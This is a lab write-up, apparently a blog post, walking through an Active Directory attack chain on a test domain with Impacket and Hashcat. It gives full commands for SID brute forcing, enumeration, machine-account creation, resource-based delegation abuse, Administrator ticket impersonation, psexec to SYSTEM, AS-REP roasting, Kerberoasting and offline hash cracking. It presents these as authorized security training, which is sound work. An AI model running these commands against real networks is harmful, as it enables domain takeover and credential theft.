Overview

In this lab, I performed a series of Active Directory exploitation techniques using Impacket, starting from domain enumeration and progressing toward Kerberos-based attacks and privilege escalation paths.

All activities were conducted in a controlled and authorized lab environment, simulating real-world attack scenarios.

This write-up focuses specifically on:

  • Impacket-based enumeration
  • SID brute forcing
  • Domain reconnaissance
  • Kerberos attack surface identification
  • AS-REP Roasting
  • Kerberoasting
  • Initial privilege escalation via delegation abuse

Lab Environment

  • Domain: ZeroDay.local
  • Domain Controller: ZeroDay-DC
  • Attacker Machine: Kali Linux
  • Tools Used: Impacket Suite, Hashcat

1. SID Enumeration via lookupsid

The engagement began with SID brute forcing to enumerate domain users and groups.

impacket-lookupsid ZeroDay.local/rahul_sharma:'Passw0rd!'@192.168.132.198

Observation

  • Successfully retrieved domain SID
  • Enumerated:
  • Domain Users
  • Domain Admins
  • Enterprise Admins
  • Service accounts like SQLService
  • Additional users: vijay_singh, rahul_sharma, ldapuser

Impact

This step provides a foundation for further attacks, especially identifying:

  • High-value targets
  • Service accounts (critical for Kerberoasting)
None
None

2. Domain User Enumeration (GetADUsers)

Next, domain-wide user enumeration was performed:

impacket-GetADUsers ZeroDay.local/Administrator:'Password@123' -dc-ip 192.168.132.198 -all

Key Findings

  • Extracted:
  • Username list
  • Password last set timestamps
  • Last logon details

Security Insight

  • Helps identify:
  • Active accounts
  • Potential stale or weak accounts
  • Targets for password attacks
None

3. Computer Enumeration (GetADComputers)

impacket-GetADComputers ZeroDay.local/Administrator:'Password@123' -dc-ip 192.168.132.198

Discovered Systems

  • ZeroDay-DC (Domain Controller)
  • DESKTOP-1 (Workstation)

Importance

  • Identifies attack surface
  • Critical for:
  • Lateral movement
  • Delegation abuse
None

4. Machine Account Abuse (addcomputer)

A new machine account was created:

impacket-addcomputer ZeroDay.local/rahul_sharma:'Passw0rd!' -computer-name FakeComp -computer-pass 'Password@123' -dc-ip 192.168.132.198

Result

  • Successfully added: FakeComp$

Why This Matters

  • By default, domain users can add machines
  • This enables:
  • Resource-Based Constrained Delegation (RBCD)
  • Privilege escalation paths
None

5. Delegation Abuse (RBCD Attack)

Delegation rights were modified:

impacket-rbcd ZeroDay.local/rahul_sharma:'Passw0rd!' -action write -delegate-to ZERODAY-DC$ -delegate-from FakeComp$ -dc-ip 192.168.132.198

Outcome

  • FakeComp$ allowed to impersonate users on ZERODAY-DC$
  • S4U2Proxy attack path enabled
None

6. Kerberos Ticket Impersonation (getST)

Using the delegated privileges:

impacket-getST -dc-ip 192.168.132.198 -spn cifs/ZeroDay-DC.ZeroDay.local -impersonate Administrator ZeroDay.local/'FakeComp$':'Password@123'

Result

  • Successfully impersonated Administrator
  • Obtained Kerberos service ticket
None

Exporting Ticket

export KRB5CCNAME=Administrator@cifs_ZeroDay-DC.ZeroDay.local@ZERODAY.LOCAL.ccache
None

7. Pass-the-Ticket (psexec)

Using the Kerberos ticket:

impacket-psexec ZeroDay.local/Administrator@ZeroDay-DC.ZeroDay.local -k -no-pass -dc-ip 192.168.132.198
None

Result

nt authority\system

8. AS-REP Roasting (GetNPUsers)

Next, Kerberos misconfiguration was exploited:

impacket-GetNPUsers -dc-ip 192.168.132.198 ZeroDay.local/ -usersfile user.txt -format john -outputfile hashes

Findings

  • Extracted AS-REP hashes for:
  • vijay_singh
  • SQLService
None

9. Offline Password Cracking

Hashes were cracked using Hashcat:

hashcat -m 18200 hashes password

Result

  • Successfully recovered credentials

Security Insight

Weak passwords remain one of the biggest risks in AD environments.

None
None

10. Kerberoasting (GetUserSPNs)

Service accounts were targeted:

impacket-GetUserSPNs -request -dc-ip 192.168.132.198 'ZeroDay.local/vijay_singh:Password@123' -outputfile kerb_hashes.txt

Discovered

  • SPN: SQLService

Extracted

  • Kerberos TGS hash
None

11. Cracking Kerberos Service Ticket

hashcat -m 13100 kerb_hashes.txt password

Result

  • Successfully cracked service account password

Impact

  • Service accounts often have:
  • Elevated privileges
  • Persistent access
None
None

Attack Chain Summary

This lab demonstrates a complete attack workflow using Impacket:

  1. SID Enumeration
  2. User & Computer Enumeration
  3. Machine Account Abuse
  4. RBCD Delegation Attack
  5. Kerberos Ticket Impersonation
  6. Pass-the-Ticket → SYSTEM access
  7. AS-REP Roasting
  8. Kerberoasting
  9. Offline Hash Cracking

Key Takeaways

  • Misconfigured Kerberos settings can lead to full domain compromise
  • Service accounts are high-value targets
  • Delegation abuse (RBCD) is extremely powerful
  • Weak passwords + Kerberos = critical risk

Disclaimer

This activity was performed in a fully authorized lab environment for educational and research purposes under ZeroDay Security Services.